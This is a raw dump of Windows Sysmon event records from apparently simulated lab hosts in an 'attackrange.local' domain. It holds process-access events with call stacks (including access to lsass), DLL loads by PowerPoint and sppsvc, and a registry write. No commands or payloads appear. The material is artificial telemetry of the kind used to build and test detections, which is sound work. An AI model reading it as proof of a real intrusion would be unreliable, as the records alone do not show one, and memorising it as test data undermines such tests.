14:58:43.185{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC23-607E-A80E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.185{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC23-607E-A70E-00000000BB01}944C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.169{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC23-607E-A80E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.169{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC23-607E-A80E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.153{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.153{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC23-607E-A70E-00000000BB01}944C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.153{A7A01FEF-B624-607E-0A00-00000000BB01}8525304C:\Windows\system32\services.exe{A7A01FEF-EC23-607E-A70E-00000000BB01}944C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.153{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.153{A7A01FEF-C0A6-607E-8105-00000000BB01}8365868C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.153{A7A01FEF-C0A6-607E-8105-00000000BB01}8365868C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:43.138{A7A01FEF-EC22-607E-A60E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1570-0\Microsoft.VisualStudio.Tools.Office.ContainerControl.dll2021-04-20 14:58:43.138 734700x800000000000000080568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.107{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000080567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.091{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.091{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.091{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.091{A7A01FEF-B626-607E-1600-00000000BB01}15401316C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+8d212|C:\Windows\system32\wbem\wmiprvsd.dll+8dfd1|C:\Windows\system32\wbem\wmiprvsd.dll+3b42f|C:\Windows\system32\wbem\wmiprvsd.dll+d4be|C:\Windows\system32\wbem\wbemcore.dll+2af4f|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000080563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:58:43.075{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\16.0\Common\Identity\Identities\administrator@attackrange.local_AD\FriendlyName(Empty) 10341000x800000000000000080562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.997{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC22-607E-A60E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050578Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:43.189{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33833E9903B6BDC974A1BFD1F121AE69,SHA256=9A1B3071320E1DC64C9966D5F4C4EEF14AEAFB701B16DFB5AA9A0246B2A67EA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.747{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B70E-00000000BB01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.732{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B70E-00000000BB01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.732{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B70E-00000000BB01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.685{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B60E-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.669{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B60E-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.669{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B60E-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000080674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.247{A7A01FEF-EC23-607E-A70E-00000000BB01}944C:\Windows\System32\sppsvc.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000080673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.638{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-B50E-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.622{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B50E-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 